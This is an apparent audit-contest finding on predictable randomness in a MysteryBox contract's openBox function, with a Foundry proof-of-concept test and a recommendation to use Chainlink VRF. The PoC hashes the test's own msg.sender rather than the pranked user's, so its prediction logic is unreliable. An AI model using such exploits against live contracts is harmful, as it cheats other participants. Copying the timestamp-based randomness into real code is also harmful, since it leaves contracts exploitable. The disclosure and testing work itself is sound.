Submission Details
Severity:
User can predict the rarity and reward of box
Summary
Randomness is predicatable in the openbox function.
Vulnerability Details
The openbox randvalue is predicted using the following logic
// Generate a random number between 0 and 99
uint256 randomValue = uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100;
Both block.timestamp and msg.sender is predictable
POC:
function test_randomness() public{
vm.deal(user1,0.1 ether);
uint winnings=0;
uint time=1;
vm.prank(user1);
mysteryBox.buyBox{value: 0.1 ether}();
console.log(address(user1).balance);
while (winnings==0){
vm.warp(++time);
if ((uint256(keccak256(abi.encodePacked(block.timestamp, msg.sender))) % 100)==99){//Making sure i always win
vm.prank(user1);
mysteryBox.openBox();
// the following block will be executed only if the user is going to win the challenge
winnings=1;
break;
}
}
vm.assertEq(winnings, 1);
}
Impact
The user can predict his/her/they/them Chances of winning the lottery every single-time in some cases even winning it outright.
Tools Used
Foundry 0.2.0
Recommendations
Consider using a decentralized oracle for the generation of random numbers, such as Chainlinks VRF.
Rewards breakdown
nSLOC
86This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.